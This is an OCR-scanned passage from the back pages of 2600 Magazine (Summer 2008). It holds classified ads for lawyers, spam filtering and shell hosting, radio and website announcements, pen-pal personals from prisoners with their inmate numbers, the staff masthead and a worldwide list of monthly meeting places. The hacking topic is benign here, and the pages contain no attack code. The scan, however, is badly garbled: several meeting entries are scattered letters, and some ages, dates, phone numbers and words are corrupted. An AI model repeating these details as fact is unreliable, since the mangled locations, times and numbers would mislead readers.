WANTED. Verified/verifiable computer hacker. Will pay $75 for interview to be used for future publication; either on-the-record or off-the-record. Response2600 (at) yahoo.com.
Services
HACKER TOOLS TREASURE BOX! You get over 660 links to key resources, plus our proven methods for rooting out the hard-to-find tools, instantly! Lets you build your own custom hacker (AHEM, network security) toolkit. http://FortressDataProtection.com/securitybook
GET A RAISE AT WORK - BLOCK MORE SPAM. SpamStopsHere (www.spamstopshere.com) is the premier solution to help you improve your boss' opinion of you, or help you keep spam away from your own business. It will help you block over 99% of spam "out of the box" and has virtually no false positives. It requires no tuning, other than having your users send any spam that does manage to get through to a special e-mail address, so it too gets blocked for all of SpamStopsHere's clients. Because of the methodology used, even medical groups and law firms, the two hardest types of organizations to spam filter, can get great success. I've been using the service myself for two years at my employer, and have personally had two false positives in that time, with h' of the mail my organization receives being spam. In the event that there is a false positive, your users can find out about it themselves and retrieve it themselves. The service is also capable of stopping viruses, putting another line of defense between a virus and your mail servers. The service even improves e-mail reliability with multiple-redundant servers at locations around the U.S., which JuIG-|t|t and forward your e-mail in the event of a hardware failure on your end. Best of all, it is very affordable, and offers a 30-day free trial. Realizing that we'd be a good market for them, I managed to negotiate a 15 percent discount off the price of the service for all 2600 readers. Simply contact Sean at sean@spamstopshere.com and mention .|||AJJ.|nt to get your discount.
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RELATED CRIME? Have an idea, invention, or business you want to buy, sell, protect, or market? Wish your attorney actually understood you when you speak? The Law Office of Michael B. Green, Esq. is the solution to your 21st century legal problems. Former SysOp and member of many private BBS's since 1981 now available to directly represent you or bridge the communications gap and assist your current legal counsel. Extremely detailed knowledge regarding criminal and civil liability for computer and technology related actions (18 USC 1028, 1029, 1030, 1031, 1341, 1342, 1343, 2511, 2512, ECPA, DMCA, 1996 Telecom Act, etc.), domain name disputes, intellectual property matters such as copyrights, trademarks, licenses and acquisitions, as well as general business and corporate law. Over 11 years experience as in-house legal counsel to a computer consulting business as well as an over 20 year background in computer, telecommunications, and technology matters. Published law review articles, contributed to nationally published books, and submitted briefs to the United States Supreme Court on Internet and technology related issues. Admitted to the U.S. Supreme Court, 2nd Circuit Court of Appeals, and all New York State courts and familiar with other jurisdictions as well. Many attorneys will take your case without any consideration of our culture and will see you merely as a source of fees or worse, with ill-conceived prejudices. My office understands our culture, is sympathetic to your situation, and will treat you with the respect and understanding you deserve. No fee for the initial and confidential consultation and, if for any reason we cannot help you, we will even try to find someone else who can at no charge. So you have nothing to lose and perhaps everything to gain by contacting us first. Visit us at: http://www.computorney.com or call 516-9WE-HELP (516-993-4357).
HAVE A PROBLEM WITH THE LAW? DOES YOUR LAWYER NOT UNDERSTAND YOU? Have you been charged with a computer related crime? Is someone threatening to sue you for something technology related? Do you just need a lawyer that understands IT and the hacker culture? I've published and presented at HOPE and Defcon on the law facing technology professionals and hackers alike. I'm both a lawyer and an IT professional. Admitted to practice law in Pennsylvania and New Jersey. Free consultation to 2600 readers. http://muentzlaw.com alex@muentzlaw.com (215) 806-4383
PIMP YOUR WIRELESS ROUTER! http://packetprotector.org. Add VPN, IPS, and web AV capabilities to your wireless router with free, open-source firmware from PacketProtector.org
ADVANCED TECHNICAL SOLUTIONS. #422 1755 Robson Street, Vancouver, B.C. Canada V6G 3B7. Ph: (604) 928-0555. Electronic countermeasures - find out who is secretly videotaping you or bugging your car or office. "State of the Art" detection equipment utilized.
INCARCERATED 2600 MEMBER NEEDS COMMUNITY HELP to build content in free classified ad and "local business directory" in 50 countries. John Lambros, the founder of Boycott Brazil, has launched a FREE classified ad, want ad, and local business directory in 50 global markets. The mission is simple: "free help to billions of people locating jobs, housing, goods and services, social activities, a girlfriend or boyfriend, community information, and just about anything else in over one million neighborhoods throughout the world - all for FREE. HELP ME OUT! SPREAD THE WORD! Please visit www.NoPayClassifieds.com and add some content. It will take all of five or ten minutes. Links to "No Pay Classifieds" are also greatly appreciated.
INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is owned and operated by intelligent hackers. We believe every user has the right to online security and privacy. In today's hostile anti-hacker atmosphere, intelligent hackers require the need for a secure place to work, compile, and explore without big-brother looking over their shoulder. Hosted at Chicago Equinix with Juniper Filtered DoS Protection. Multiple FreeBSD servers at P4 2.4 ghz. Affordable pricing from $5/month with a money back guarantee. Lifetime 26% discount for 2600 readers. Coupon code: Save2600. http://www.reverse.net
Announcements
OFF THE HOOK is the weekly one hour hacker radio show presented Wednesday nights at 7:00 pm ET on WBAI 99.5 FM in New York City. You can also tune in over the net at www.2600.com/offthehook or on shortwave in North and South America at 7415 khz. Archives of all shows dating back to 1988 can be found at the 2600 site in mp3 format! Shows from 1988-2006 are now available in DVD-R high fidelity audio for only $10 a year or $150 for a lifetime subscription. Send check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or order through our online store at http://store.2600.com. Your feedback on the program is always welcome at oth@2600.com.
THE HACKERS YOUTUBE. Video sharing community for uploading and watching streaming hacking, modding, and underground videos that the community can rely on to deliver quality content to anyone willing to take the time to learn. http://www.veryangrytoad.com
THE HIGH WEIRDNESS PROJECT. We are a SubGenius wiki seeking submissions of strange, controversial, subversive, and above all Slackful sources of information. We do not follow a so-called "neutral point of view" - please make your entries as biased as you want, as long as they're interesting! Special sections dedicated to information warfare, software, conspiracies, religion and skepticism, and more. Check us out: www.modemac.com.
PHONE PHUN. http://phonephun.us. Blog devoted to interesting phone numbers. Share your finds!
Personals
COUNTER-INTELLIGENCE, HACKING, computer related countermeasures. Former intelligence officer interested in new computer related technology. In search of friends, contacts, and worldwide penpals any age, race, or orientation. If possible, include photo with letter. No nudity, polaroids, or inmate mail. Spanish or English OK. I purchase magazines, books, unusual pictures with my own funds. WM, 6', 180, blonde, brown - will respond to all. Interested in info on financial privacy, offshore trusts, hacking, and counterintelligence. D. Coryell, T-68127, PO Box 8504, D3-247up, Coalinga, CA 93210.
WHEN THE BULLET HITS THE BONE. Change of address. If you tried to send mail and it got returned, that's why. Bored and lonely phone nerd with some time left in our nation's wonderful corrections system. Still looking for pen pals to help me pass the time. Will respond to all. Interests include but not limited to telecom, computers, politics, music, tats, urban exploration, electronics. I'm a 23 yrs white male, black hair, green eyes. Some tats. Michael Kerr 09496-029, FCI Oxford, PO Box 1000, Oxford, WI 53952.
ZJ YEAR OLD SERVING Z YEARS in Sheridan, Oregon for hacking into AT&T plus many other VoIP providers. First to be charged with VoIP crimes. Featured on America's Most Wanted with K. Mitnick. Looking for ANYONE to write me. Check freerobert.com for more info.
GAY PRISONER SEEKS FRIENDS to help with book review lookups on Amazon by keywords. Com Sci major, thirsty to catch up to the real world before my reentry. I have my own funds to buy books. I only need reviews. I'm MUD/MMORPG savvy in C++, Java, Python, PHP, MySQL, DirectX. Ken Roberts J60962, 450-1-28M, PO Box 9, Avenal, CA 93204.
OFFLINE OUTLAW IN TEXAS needs some help in developing programming skills. Interested in Perl and JavaScript. Also privacy in all areas. Library here is inadequate. Feel free to drop those Bill Me Later cards, add me to the mailing lists, etc. Thanks to all those who have helped me so much already, you know who you are. William Lindley 822934, CT Terrell, 1300 FM 655, Rosharon, TX 77583-8604
ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying to take out an ad unless you subscribe! All ads are free and there is no amount of money we will accept for a non-subscriber ad. We hope that's clear. Of course, we reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world. We make no guarantee as to the honesty, righteousness, sanity, etc. of the people advertising here. Contact them at your peril. All submissions are for ONE ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. Don't expect us to run more than one ad for you in a single issue either. Include your address label/envelope or a photocopy so we know you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953.
Deadline for Autumn issue: /Z5/0.
The 900 page collection of highlights from our 24 years of publishing is now out, including all sorts of new commentary to go along with the historic material. Published by Wiley and available at bookstores everywhere, obtainable via amazon.com, bn.com, borders.com, and countless other sites throughout the world.
"There's no place like HOPE"
- random Last HOPE attendee, I:
STAFF
Editor-In-Chief
Emmanuel Goldstein
Associate Editor
Mike Castleman
Layout and Design
Skram
Cover
Dabu Ch'wald
Office Manager
Tampruf
Writers: Bernie S., Billsf, Bland Inquisitor, Eric Corley, Dragorn, Paul Estev, Mr. French, Javaman, Joe630, Graverose, Kingpin, Kn1ghtl0rd, Kevin Mitnick, The Prophet, Redbird, David Ruderman, Screamer Chaotix, Silent Switchman, StankDawg, Mr. Upsetter
IT Operations: css, Juintz
IRC Admins: beave, mangala, koz, r0d3nt
Broadcast Coordinators: Juintz, thai
2600 (ISSN 0749-3851, USPS # 003-176); Summer 2008, Volume 25 Issue 2, is published quarterly by 2600 Enterprises Inc., 2 Flowerfield, St. James, NY 11780. Periodical postage rates paid at St. James, NY and additional mailing offices.
POSTMASTER: Send address changes to: 2600, P.O. Box 752, Middle Island, NY 11953-0752.
SUBSCRIPTION CORRESPONDENCE: 2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 USA (subs@2600.com)
Inspirational Music: Kylie Minogue, Anti-Flag, Adam Green, Phathead/Ogun, The Album Leaf, Mullyman, Steve Earle, Lucienne Boyer, Tyree Colion, Elliott Smith, DJ Shadow, Mikey Dread
Shout Outs: Alain Mueller, Brauerei Loscher, AI and Zach, the AMD team, the Wiley crew, WKKX in Wheeling, Cory Doctorow, Lexicon, Daravinne, aestetix, Alpha Centauri, Marc Tobias, Phil Torrone, Rat Man, Froggy
RIP: Arthur C. Clarke, Hopscotch
YEARLY SUBSCRIPTIONS:
U.S. and Canada $24 individual, $50 corporate (U.S. Funds)
Overseas $34 individual, $65 corporate
Back issues available for 1984-2007 at $25 per year, $34 per year overseas
Individual issues available from 1988 on at $6.25 each, $8.50 each overseas
LETTERS AND ARTICLE SUBMISSIONS:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 USA (letters@2600.com, articles@2600.com)
2600 Office Line: +1 631 751 2600
2600 Fax Line: +1 631 474 2677
Copyright 2008; 2600 Enterprises Inc.
ARGENTINA
Buenos Aires: The "Cruzat Beer House" bar, Sarmiento 1617 (first floor, Paseo La Plaza).
AUSTRALIA
Melbourne: Caffeine at ReVault Bar, 16 Swanston Walk, near Melbourne Central Shopping Centre. 6:30 pm
Sydney: The Crystal Palace, front bar/bistro, opposite the bus station area on George St at Central Station. 6 pm
AUSTRIA
Graz: Cafe Haltestelle on Jakominiplatz.
BRAZIL
Belo Horizonte: Pelego's Bar at Assufeng, near the payphone. 6 pm
CANADA
Alberta
Calgary: Eau Claire Market food court by the bland yellow wall. 6 pm
British Columbia
Victoria: QV Bakery and Cafe, 1701 Government St.
Manitoba
Winnipeg: St. Vital Shopping Centre, food court by HMV.
New Brunswick
Moncton: Champlain Mall food court, near KFC. 7 pm
Ontario
Barrie: William's Coffee Pub, 505 Bryne Dr. 7 pm
Guelph: William's Coffee Pub, 492 Edinbourgh Rd S. 7 pm

a
Mb
e` ';dff
l a
z
a,
6: 30 pm
Toronto: Free Times Cafe, College and Spadina.
Windsor: University of Windsor, CAW Student Center commons area by the large window. 7 pm
Quebec
Montreal: Bell Amphitheatre, 1000, rue de la Gauchetiere.
CHINA
Hong Kong: Pacific Coffee in Festival Walk, Kowloon Tong. 7 pm
CZECH REPUBLIC
Prague: Legenda pub. 6 pm
DENMARK
Aalborg: Fast Eddie's pool hall.
Aarhus: In the far corner of the DSB cafe in the railway station.
Copenhagen: Cafe Blasen.
Sonderborg: ColcDrll en. 7:30 pm
EGYPT
Port Said: At the foot of the Obelisk (El Missallah).
ENGLAND
Brighton: At the phone boxes by the Sealife Centre (across the road from the Palace Pier). Payphone: (01273) 606674. pm
Exeter: At the payphones, Bedford Square. 7 pm
Kent: At the end of the bus station opposite Wilkinsons, Canterbury. 6:30 pm
London: Trocadero Shopping Center (near Piccadilly Circus), lowest level. 6:30 pm
Manchester: Bulls Head Pub on London Rd. 7:30 pm
Norwich: Borders entrance to Chapelfield Mall. n pm
Reading: Afro Bar, Merchants Place, off Fri :i
A
6r
D
m
Helsinki: Fenniakortteli food court (Vuorikatu 14).
FRANCE
Grenoble: Eve, campus of St. Martin d'Heres. 6 pm
Lille: Grand-Place (Place Charles de Gaulle) in front of the Furet du Nord bookstore. 9 pm
Paris: Place de la Republique, near the (empty) fountain. 6:30 pm
Rennes: In front of the store "Blue Box" close to Place de la Republique. 8 pm
GREECE
Athens: Outside the bookstore Papasotiriou on the corner of Patision and Stournari. 7 pm
IRELAND
Dublin: At the phone booths on Wicklow St beside Tower Records. 7 pm
ITALY
Milan: Piazza Loreto in front of McDonalds.
JAPAN
Tokyo: Linux Cafe in Akihabara district. 6 pm
NEW ZEALAND
Auckland: London Bar, upstairs, Wellesley St, Auckland Central. 5:30 pm
Christchurch: Java Cafe, corner of High St and Manchester St. 6 pm
Wellington: Load Cafe in Cuba Mall. 6 pm
MEXICO
Mexico City: "Zocalo" Subway Station (Line 2 of the "METRO" subway, the blue one). At the "Departamento del Distrito Federal" exit, near the payphones and the candy shop, at the beginning of the "Zocalo-Pino Suarez" tunnel.
NORWAY
Oslo: Oslo Sentral Train Station. 7 pm
Tromsoe: The upper floor at Blaa Rock Cafe, Strandgata 14. 6 pm
Trondheim: Rick's Cafe in Nordregate. 6 pm
PERU
Lima: Barbilonia (ex Apu Bar), en Alcanfores 455, Miraflores, at the end of Tarata St. 8 pm
SCOTLAND

a
o
s
i:m 1 .
7 pm
SOUTH AFRICA
Johannesburg (Sandton City): Sandton food court. 6:30 pm
SWEDEN
Gothenburg: 2nd floor in Burger
ko
n
6tsdava.
SWITZERLAND
Lausanne: In front of the MacDo beside the train station. 7 pm
UNITED STATES
Alabama
Auburn: The student lounge upstairs in the Foy Union

i
.fi.:; nlieo's Sub Villa on Jordan Lane.
Tuscaloosa: McFarland Mall food court near the front entrance.
Arizona
Phoenix: Unlimited Coffee (741 |. Glendale Ave). 6 pm
Tucson: Borders in the Park Mall. 7 pm
California
Irvine: Panera Bread, 3988 Barranca Parkway. 7 pm
Los Angeles: Union Station, corner of Macy & Alameda. Inside main entrance by bank of phones. Payphones: , 2 J 3 i 'J 2 -'JS J 9, 920, 625-9923, 9924; 613-9704, 9746.
Monterey: Mucky Duck, 479 Alvarado St. 5:30 pm.
Sacramento: Round Table Pizza at 127 K St.
San Diego: Regents Pizza, 4150 Regents Park Row #170.
San Francisco: 4 Embarcadero Plaza (inside). 5:30 pm
San Jose: Outside the cafe at the MLK Library at 4th and E San Fernando. 6 pm
Colorado
Boulder: Wing Zone food court, 13th and College. 6 pm
Lakewood: Barnes and Noble in the Denver West Shopping Center, 14347 W Colfax Ave.
District of Columbia
Arlington: Pentagon City Mall by the phone booths next to Panda Express. 6 pm
Florida
Ft. Lauderdale: Broward Mall in the food court. 6 pm
Gainesville: In the back of the University of Florida's Reitz Union food court. 6 pm
Melbourne: House of Joe Coffee House, 1220 W New Haven
Fashion Square Mall Food Court between Hovan Gourmet and Manchu Wok. 6 pm
Tampa: University Mall in the back of the food court on the 2nd floor. 6 pm
Atlanta: Lenoe:'l i food court. 7 pm
Idaho
Boise: BSU Student Union Building, upstairs from the main entrance. Payphones: (208) 342-9700, 9701.
Pocatello: College Market, 604 S 8th St.
Illinois
'I
a
ib
i
".
h
,

k
and
Rd. 7 pm
Indiana
Evansville: Barnes and Noble cafe
at 624 S Green River Rd.
Ft. Wayne: Glenbrook Mall food
court in front of Sbarro's. 6 pm
Indianapolis: Mo'Joe Coffee
House, 222 W Michigan St.
South Bend (Mishawaka): Barnes
and Noble cafe, 4601 Grape Rd.
Iowa
Ames: Memorial Union Building
food court at the Iowa State
University.
Kansas
rk
sa
al
i
"
d Prk): Oak
Wichita: Riverside Perk, 1144
Bitting Ave.
Louisiana
Baton Rouge: In the LSU Union
Building, between the Tiger Pause
& McDonald's. 6 pm
New Orleans: Z'otz Coffee House
uptown at 8210 Oak St. 6 pm
Maine
Portland: Maine Mall by the
bench at the food court door.
Maryland
Baltimore: Barnes & Noble cafe at
the Inner Harbor.
Massachusetts
Boston: Prudential Center Plaza,
terrace food court at the tables
near the windows. 6 pm
Marlborough: Solomon Park Mall
food court. 6 pm
Northampton: Downstairs of
Haymarket Cafe. 6 pm
Michigan
Ann Arbor: Starbucks in The
Galleria on S University.
Minnesota
Bloomington: Mall of America,
north side food court, across
from Burger King & the bank
of payphones that don't take
incoming calls.
Missouri
Kansas City (Independence):
Barnes & Noble, 19120 E 39th St.
St. Louis: Galleria Food Court.
Springfield: Borders Books and
Music coffeeshop, 3300 S Glenstone
Ave, one block south of
Battlefield Mall. 5:30 pm
Nebraska
Omaha: Crossroads Mall Food
Court. 7 pm
Nevada
Las Vegas: reJAVAnate Coffee,
3300 E Flamingo Rd (at Pecos).
7 pm
New Mexico
Albuquerque: University of New
Mexico Student Union Building
(plaza "lower" level lounge),
main campus. Payphones:
505-843-9033, 505-843-9034.
5:30 pm
New York
New York: Citigroup Center, in the
lobby, near the payphones, 153 E
53rd St, between Lexington & 3rd.
Rochester: Panera Bread, 2373 W
Ridge Rd. 7:30 pm
North Carolina
Charlotte: South Park Mall food
court. 7 pm
Raleigh: Royal Bean coffee shop
on Hillsboro St (next to the Playmakers
Sports Bar and across from
Meredith College).
Wilmington: The Connection
Internet Cafe, 2501 Racine Drive,
Racine Commons Shopping
Center.
North Dakota
Fargo: West Acres Mall food court
by the Taco John's. 6 pm
Ohio
Cincinnati: The Brew House, 1047
E McMillan. 7 pm
Cleveland: University Circle
Arabica, 11300 Juniper Rd.
Upstairs, turn right, second room
on left.
Columbus: Convention center on
street level around the corner from
the food court.
Dayton: TGI Friday's off 725 by
the Dayton Mall.
Oklahoma
Oklahoma City: Cafe Bella,
southeast corner of SW 89th St
and Penn.
Tulsa: Promenade Mall food court.
Oregon
Portland: Backspace Cafe, 115
NW 5th Ave. 6 pm
Pennsylvania
Allentown: Panera Bread, 3100 W
Tilghman St. 6 pm
Harrisburg: Panera Bread, 4263
Union Deposit Rd. 6 pm
Philadelphia: 30th St Station,
southeast food court near mini
post office.
South Carolina
Charleston: Northwoods Mall
in the hall between Sears and
Chik-Fil-A.
South Dakota
Sioux Falls: Empire Mall, by
Burger King.
Tennessee
Knoxville: Borders Books Cafe
across from Westown Mall.
Memphis: Quetzal, 664 Union
h.iG Vanderbilt University
Hill Center, Room 151, 1231 18th
Ave S. 6 pm
Texas
r
n
t,
s
ft r
s
:c
'
f
8
-Tnfa's Express in front
of Nordstrom's in the Galleria
Mall.
San Antonio: North Star Mall food
court. 6 pm
Utah
Salt Lake City: ZCMI Mall in The
Park Food Court.
Vermont
h
t
S
t
n

d
o
!

n
a
t
t
he
second floor of the cafe.
Virginia
Arlington: (see District of
Columbia)
Charlottesville: Panera Bread
at the Barracks Road Shopping
Center. 6:30 pm.
Virginia Beach: Lynnhaven Mall
on Lynnhaven Parkway. 6 pm
Washington

tt

n:
s
1
e

,
t

h
onven
-
si de. 6 pm
Spokane: Coffee Station, 9315 N
Nevada (North Spokane). 6 pm
Wisconsin
Madison: Fair Trade Coffee House,
418 State St.
All meetings take place on the
first Friday of the month.
Unless otherwise noted, they
start at 5 pm local time. To start
a meeting in your city, send
email to meetings@2600.com.
Page 66
2600 Magazine
